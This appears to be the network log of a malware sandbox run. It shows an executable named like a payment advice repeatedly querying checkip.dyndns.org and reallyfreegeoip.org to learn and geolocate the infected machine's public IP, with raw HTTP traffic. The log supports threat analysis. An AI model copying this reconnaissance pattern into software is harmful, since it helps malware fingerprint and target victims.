                                                                                                                                        6192.168.2.551079158.101.44.242806256C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Nov 16, 2024 16:51:25.883302927 CET151OUTGET / HTTP/1.1
                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Nov 16, 2024 16:51:26.523466110 CET323INHTTP/1.1 200 OK
                                                                                                                                        Date: Sat, 16 Nov 2024 15:51:26 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Content-Length: 106
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Pragma: no-cache
                                                                                                                                        X-Request-ID: 53b6cc8c61e6d06e8300b0101e89a3cf
                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        7192.168.2.551081158.101.44.242806256C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Nov 16, 2024 16:51:27.337636948 CET151OUTGET / HTTP/1.1
                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Nov 16, 2024 16:51:27.984122038 CET323INHTTP/1.1 200 OK
                                                                                                                                        Date: Sat, 16 Nov 2024 15:51:27 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Content-Length: 106
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Pragma: no-cache
                                                                                                                                        X-Request-ID: 3f68b1d69ef8e3f73810cacf3b1dd0b5
                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        0192.168.2.551067188.114.97.34436256C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-11-16 15:51:16 UTC87OUTGET /xml/173.254.250.69 HTTP/1.1
                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        2024-11-16 15:51:17 UTC854INHTTP/1.1 200 OK
                                                                                                                                        Date: Sat, 16 Nov 2024 15:51:17 GMT
                                                                                                                                        Content-Type: text/xml
                                                                                                                                        Content-Length: 359
                                                                                                                                        Connection: close
                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                        Age: 24550
                                                                                                                                        Last-Modified: Sat, 16 Nov 2024 09:02:07 GMT
                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1dF0BCJsBobdOBYryLWqMAFWWOJLeVDZ9iKVhTUTOG1Eik%2F7NEZKGD%2FoKAiWIt7%2BXBN0W2wwHoW6msdbqhDVg0zIq4smExBQLdcbgFb3s%2Bl59deS16uGBWdieU3PTAYE12z%2B7DEg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                        Server: cloudflare
                                                                                                                                        CF-RAY: 8e38a43b4ebc45ee-DFW
                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1070&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2581105&cwnd=237&unsent_bytes=0&cid=e3bf705474e827fb&ts=203&x=0"
                                                                                                                                        2024-11-16 15:51:17 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                                        Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        1192.168.2.551068188.114.97.34436256C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-11-16 15:51:17 UTC63OUTGET /xml/173.254.250.69 HTTP/1.1
                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                        2024-11-16 15:51:18 UTC854INHTTP/1.1 200 OK
                                                                                                                                        Date: Sat, 16 Nov 2024 15:51:17 GMT
                                                                                                                                        Content-Type: text/xml
                                                                                                                                        Content-Length: 359
                                                                                                                                        Connection: close
                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                        Age: 24550
                                                                                                                                        Last-Modified: Sat, 16 Nov 2024 09:02:07 GMT
                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YgTbh9mPo%2FYw43BN4oWCrh3QbOHQ%2FwGtmjp0uXFLQN8gWZhQoR%2B%2FktKUbn74sHINi0tPCsSlh0qQF3pA1bzi0E9Bwb2Xn1IgiWHbOPNdBlp6l%2BG8Uf63RaqtCZmRWikkiXxvsfdv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                        Server: cloudflare
                                                                                                                                        CF-RAY: 8e38a441382c2cca-DFW
                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1162&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2403319&cwnd=251&unsent_bytes=0&cid=f464a0ed1b8ef21c&ts=150&x=0"
                                                                                                                                        2024-11-16 15:51:18 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                                        Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        2192.168.2.551070188.114.97.34436256C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-11-16 15:51:19 UTC87OUTGET /xml/173.254.250.69 HTTP/1.1
                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        2024-11-16 15:51:19 UTC852INHTTP/1.1 200 OK
                                                                                                                                        Date: Sat, 16 Nov 2024 15:51:19 GMT
                                                                                                                                        Content-Type: text/xml
                                                                                                                                        Content-Length: 359
                                                                                                                                        Connection: close
                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                        Age: 24552
                                                                                                                                        Last-Modified: Sat, 16 Nov 2024 09:02:07 GMT
                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gXjJde3lo2qCKeI198ui2%2BInqh2E4ZS6YZQ3pmwbly4vk1k1nWc1eBmGpPZgf2P4SS%2BVJ9p8BNSBIrFVfs2zci1GZJ1rjCeP5M%2Bo%2FGhaQ2ex1Wg3QylTYv0JxwUUZ7Jz4GBY6mNA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                        Server: cloudflare
                                                                                                                                        CF-RAY: 8e38a44a1c196c79-DFW
                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=5444&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=1526620&cwnd=251&unsent_bytes=0&cid=e068a8b29423aba0&ts=162&x=0"
                                                                                                                                        2024-11-16 15:51:19 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                                        Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        3192.168.2.551072188.114.97.34436256C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-11-16 15:51:20 UTC63OUTGET /xml/173.254.250.69 HTTP/1.1
                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                        2024-11-16 15:51:20 UTC850INHTTP/1.1 200 OK
                                                                                                                                        Date: Sat, 16 Nov 2024 15:51:20 GMT
                                                                                                                                        Content-Type: text/xml
                                                                                                                                        Content-Length: 359
                                                                                                                                        Connection: close
                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                        Age: 24553
                                                                                                                                        Last-Modified: Sat, 16 Nov 2024 09:02:07 GMT
                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dPhukyeMheEUzd0AWbtmZWmb577Hr7533r05v0%2Btd3nl9MTPQ5DgFiB5pAiZxyqihMoS%2FBOqQy7fNVuE7P9u200nv6FVDXoWpaSFWvYAMV9KB45a29iHz%2BJG1LNN2EMdzwLGj4TQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                        Server: cloudflare
                                                                                                                                        CF-RAY: 8e38a4538856ddaf-DFW
                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1053&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2693953&cwnd=252&unsent_bytes=0&cid=70898dc7a9345faf&ts=149&x=0"
                                                                                                                                        2024-11-16 15:51:20 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                                        Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        4192.168.2.551074188.114.97.34436256C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-11-16 15:51:22 UTC63OUTGET /xml/173.254.250.69 HTTP/1.1
                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                        2024-11-16 15:51:22 UTC846INHTTP/1.1 200 OK
                                                                                                                                        Date: Sat, 16 Nov 2024 15:51:22 GMT
                                                                                                                                        Content-Type: text/xml
                                                                                                                                        Content-Length: 359
                                                                                                                                        Connection: close
                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                        Age: 24555
                                                                                                                                        Last-Modified: Sat, 16 Nov 2024 09:02:07 GMT
                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BUisO6i64fvyclqei8uihw36KD0qe7WEj%2Fgbal13VWBJXJj0lBJC0fzkTBvYa9HSrpKgN5sj5J6foLchcSn6Tsuo4lQvTEYH0oWeECPs7jh61E5CQP6YLaFD0EA9Us78uff2oO6R"}],"group":"cf-nel","max_age":604800}
                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                        Server: cloudflare
                                                                                                                                        CF-RAY: 8e38a45e3fc64638-DFW
                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1242&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2030855&cwnd=251&unsent_bytes=0&cid=c28fcfe923513c8d&ts=228&x=0"
                                                                                                                                        2024-11-16 15:51:22 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                                        Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        5192.168.2.551076188.114.97.34436256C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-11-16 15:51:24 UTC63OUTGET /xml/173.254.250.69 HTTP/1.1
                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                        2024-11-16 15:51:24 UTC858INHTTP/1.1 200 OK
                                                                                                                                        Date: Sat, 16 Nov 2024 15:51:24 GMT
                                                                                                                                        Content-Type: text/xml
                                                                                                                                        Content-Length: 359
                                                                                                                                        Connection: close
                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                        Age: 24557
                                                                                                                                        Last-Modified: Sat, 16 Nov 2024 09:02:07 GMT
                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2BjmHVr%2FjrOnhCh%2BjkXSzLfjgqmZ4gNnBvVxWlyTlXQ5ifgu2pdUFId%2BuQji0ZVEUui9JX3MBnb1L%2BAzXPeZfjKx4nxvc%2BOyOX0h5MfAUp8IG8%2FJD0nJN9zltiNrFb5ovIStfN3a"}],"group":"cf-nel","max_age":604800}
                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                        Server: cloudflare
                                                                                                                                        CF-RAY: 8e38a467ba870beb-DFW
                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1550&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=1845761&cwnd=251&unsent_bytes=0&cid=bfb40c29a3ae5db0&ts=161&x=0"
                                                                                                                                        2024-11-16 15:51:24 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                                        Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        6192.168.2.551078188.114.97.34436256C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-11-16 15:51:25 UTC63OUTGET /xml/173.254.250.69 HTTP/1.1
                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                        2024-11-16 15:51:25 UTC848INHTTP/1.1 200 OK
                                                                                                                                        Date: Sat, 16 Nov 2024 15:51:25 GMT
                                                                                                                                        Content-Type: text/xml
                                                                                                                                        Content-Length: 359
                                                                                                                                        Connection: close
                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                        Age: 24558
                                                                                                                                        Last-Modified: Sat, 16 Nov 2024 09:02:07 GMT
                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zYYy%2Bl8QbnOtZCJ7LRRCk8QGDF6cpfP0XYzldVjelSBSmdIC%2BLbnPjZhhmZ0kEqTketaaFs2DsayWx1aktwW4TyOepzo663328d3FIm2smaJQKuTwBuCs1zHDWV0Hbir7daIYZTd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                        Server: cloudflare
                                                                                                                                        CF-RAY: 8e38a4723d142e75-DFW
                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1941&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1852847&cwnd=245&unsent_bytes=0&cid=7e98d56a8976e6f5&ts=152&x=0"
                                                                                                                                        2024-11-16 15:51:25 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                                        Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        7192.168.2.551080188.114.97.34436256C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-11-16 15:51:27 UTC87OUTGET /xml/173.254.250.69 HTTP/1.1
                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        2024-11-16 15:51:27 UTC850INHTTP/1.1 200 OK
                                                                                                                                        Date: Sat, 16 Nov 2024 15:51:27 GMT
                                                                                                                                        Content-Type: text/xml
                                                                                                                                        Content-Length: 359
                                                                                                                                        Connection: close
                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                        Age: 24560
                                                                                                                                        Last-Modified: Sat, 16 Nov 2024 09:02:07 GMT
                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aRe%2Flc1x4UyVSaVARpbQ5XP14V5FCyw9G1FmOUki0XxsfobvmPYydLVhmp3d9dlxzkHCGnag51KEV%2FDXaYpNi26psDYHoX7qZWvsAtEUQudOnWJAcOYzaSRFFy2zOjVaewHcqIH%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                        Server: cloudflare
                                                                                                                                        CF-RAY: 8e38a47b1c2da924-DFW
                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1371&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1971409&cwnd=201&unsent_bytes=0&cid=3214b4eced1eee82&ts=159&x=0"
